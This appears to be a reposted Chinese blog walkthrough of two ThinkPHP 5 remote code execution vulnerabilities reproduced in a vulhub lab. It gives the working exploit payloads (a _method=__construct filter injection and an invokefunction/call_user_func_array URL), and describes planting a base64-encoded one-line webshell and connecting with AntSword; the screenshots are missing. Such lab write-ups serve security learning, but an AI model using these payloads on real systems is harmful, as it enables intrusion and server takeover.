thinkphp框架漏洞

发布时间:2022-07-05 发布网站:脚本宝典
脚本宝典收集整理的这篇文章主要介绍了thinkphp框架漏洞脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。

thinkphp5 5.0.23 远程代码执行漏洞

进入vulhub靶场,启动环境。访问http://ip:8080测试靶场是否正常启动

thinkphp框架漏洞

 

 

使用hcakbar工具,构造payload,构造完毕后点击Execute

 

_method=__construct&filter[]=System&;method=get&server[REQUEST_METHOD]=

 

thinkphp框架漏洞

 

 

命令执行成功使用phpinfo验证漏洞

thinkphp框架漏洞

 

 

 写入一句话木马,一句话木马要进行base64编码

thinkphp框架漏洞

 

 

 

thinkphp框架漏洞

进入容器,查看木马文件是否写入

thinkphp框架漏洞

 

 

 然后使用蚁剑连接

thinkphp框架漏洞

 

 

 成功getshell

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

 

进入vulhub靶场。启动环境

thinkphp框架漏洞

 

http://192.168.116.166:8080/index.php?s=/Index/thinkapp/invokefunction&function=call_user_func_array&VARs[0]=phpinfo&vars[1][]=-1

 

 

 

 

thinkphp框架漏洞

 

 

 

代码执行成功说明存在远程代码执行漏洞

thinkphp框架漏洞

待更新

 

脚本宝典总结

以上是脚本宝典为你收集整理的thinkphp框架漏洞全部内容,希望文章能够帮你解决thinkphp框架漏洞所遇到的问题。

如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。